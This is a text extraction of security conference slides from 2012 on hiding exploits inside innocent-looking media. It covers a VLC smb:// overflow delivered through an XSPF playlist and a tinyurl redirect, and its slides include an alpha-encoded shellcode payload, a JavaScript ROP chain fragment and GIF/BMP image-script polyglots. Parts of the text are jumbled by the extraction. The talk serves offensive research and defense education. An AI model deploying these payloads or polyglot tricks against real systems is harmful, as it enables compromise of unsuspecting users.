Saumil Shah, CEO of Net-Square, discusses advanced hacking techniques, including exploitation of VLC and image formats for malicious purposes. He delves into the use of encoded exploits and JavaScript vulnerabilities, emphasizing that seemingly benign files can harbor harmful code. The document serves as both a presentation of techniques and a warning about the evolving nature of security threats in the digital landscape.

1. when Bad
Things
come in
Good
packages
Saumil Shah
net-square DEEPSEC 2012

2. # who am i
Saumil Shah, CEO Net-Square.
• Hacker, Speaker, Trainer,
Author - 15 yrs in Infosec.
• M.S. Computer Science
Purdue University.
• saumil@net-square.com
• LinkedIn: saumilshah
• Twitter: @therealsaumil
net-square

3. My area of work
Penetration Reverse Exploit
Testing Engineering Writing
New Offensive Attack
Research Security Defense
Conference Conference "Eyes and
Speaker Trainer ears open"
net-square

4. When two forces combine...
Web Binary
Hacking Exploits
net-square

5. SNEAKY
LETHAL
net-square

6. net-square

7. 302 IMG JS HTML5
net-square

8. net-square

9. VLC smb overflow
• smb://example.com@0.0.0.0/foo/
#{AAAAAAAA....}
• Classic Stack Overflow.
net-square

10. VLC XSPF file
<?xml version="1.0" encoding="UTF-8"?>!
<playlist version="1"!
xmlns="http://xspf.org/ns/0/"!
xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">!
<title>Playlist</title>!
<trackList>!
<track>!
<location>!
smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}!
</location>!
<extension!
application="http://www.videolan.org/vlc/playlist/0">!
<vlc:id>0</vlc:id>!
</extension>!
</track>!
</trackList>!
</playlist>!
net-square

11. Alpha
Encoded
Tiny ZOMFG!
Exploit URL
net-square

12. 100% Pure
Alphanum!
net-square

13. VLC smb overflow - HTMLized!!
"<embed type="application/x-vlc-plugin"!
" "width="320" height="200"!
" "target="http://tinyurl.com/ycctrzf"!
" "id="vlc" />!
net-square

14. 301 Redirect from tinyurl
HTTP/1.1 301 Moved Permanently!
X-Powered-By: PHP/5.2.12!
Location: smb://example.com@0.0.0.0/foo/
#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1!
JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII!
IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL!
KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk!
PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH!
kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn!
CUCHPeEPAA}!
Content-type: text/html!
Content-Length: 0!
Connection: close!
Server: TinyURL/1.6!
net-square

15. net-square

16. Exploits as Images - 1
• Grayscale encoding (0-255).
• 1 pixel = 1 character.
• Perfectly valid image.
• Decode and Execute!
net-square

17. net-square

18. I'm an evil Javascript
I'm an innocent image
net-square

19. function packv(n)
{var s=new
Number(n).toStri
ng(16);while(s.l
return(unescape( ength<8)s="0"+s;
"%u"+s.substring
string(0,4)))}va (4,8)+"%u"+s.sub
r addressof=new
Array();addresso
f["ropnop"]=0x6d
["xchg_eax_esp_r 81bdf0;addressof
et"]=0x6d81bdef;
ax_ret"]=0x6d906 addressof["pop_e
744;addressof["p
d81cd57;addresso op_ecx_ret"]=0x6
f["mov_peax_ecx_
;addressof["mov_ ret"]=0x6d979720
eax_pecx_ret"]=0
sof["mov_pecx_ea x6d8d7be0;addres
x_ret"]=0x6d8eee
c_eax_ret"]=0x6d 01;addressof["in
838f54;addressof
]=0x00000000;add ["add_eax_4_ret"
ressof["call_pea
31;addressof["ad x_ret"]=0x6d8aec
d_esp_24_ret"]=0
sof["popad_ret"] x00000000;addres
=0x6d82a8a1;addr
"]=0x6d802597;fu essof["call_peax
nction
call_ntallocatev
irtualmemory(bas
m){var ropnop=pac eptr,size,callnu
kv(addressof["ro
pop_eax_ret=pack pnop"]);var
v(addressof["pop
pop_ecx_ret=pack _eax_ret"]);var
v(addressof["pop
mov_peax_ecx_ret _ecx_ret"]);var
=packv(addressof
et"]);var ["mov_peax_ecx_r
mov_eax_pecx_ret
=packv(addressof
et"]);var ["mov_eax_pecx_r
mov_pecx_eax_ret
=packv(addressof
et"]);var ["mov_pecx_eax_r
call_peax_ret=pa
ckv(addressof["c
var all_peax_ret"]);
add_esp_24_ret=p
ackv(addressof["
);var add_esp_24_ret"]
popad_ret=packv(
addressof["popad
retval=""! _ret"]);var
<CANVAS>
net-square

20. net-square
See no eval()

21. Same Same No Different!
var a = eval(str);
a = (new Function(str))();
net-square

22. IMAJS
net-square I iz being a Javascript

23. IMAJS
<img src="itsatrap.gif">
<script src="itsatrap.gif">
</script>
net-square

24. IMAJS-GIF Browser Support
Height Width Browser/Viewer Image Javascript
Renders? Executes?
2f 2a 00 00 Firefox yes yes
2f 2a 00 00 Safari yes yes
2f 2a 00 00 IE no yes
2f 2a 00 00 Chrome yes yes
2f 2a 00 00 Opera ? ?
2f 2a 00 00 Preview.app yes -
2f 2a 00 00 XP Image Viewer no -
2f 2a 00 00 Win 7 Preview yes -
net-square

25. IMAJS-BMP Browser Support
Height Width Browser/Viewer Image Javascript
Renders? Executes?
2f 2a 00 00 Firefox yes yes
2f 2a 00 00 Safari yes yes
2f 2a 00 00 IE yes yes
2f 2a 00 00 Chrome yes yes
2f 2a 00 00 Opera yes yes
2f 2a 00 00 Preview.app yes -
2f 2a 00 00 XP Image Viewer yes -
2f 2a 00 00 Win 7 Preview yes -
net-square

26. The αq Exploit
net-square

27. Demo
IMAJS αq FTW!
net-square

28. Alpha encoded exploit code
IMAJS CANVAS "loader" script
net-square

29. These are not the sploits
you're looking for
net-square

30. No virus threat detected
net-square

31. The FUTURE?
net-square

32. when Bad
Things
come in
Good
packages
THE END
@therealsaumil
saumil@net-square.com
net-square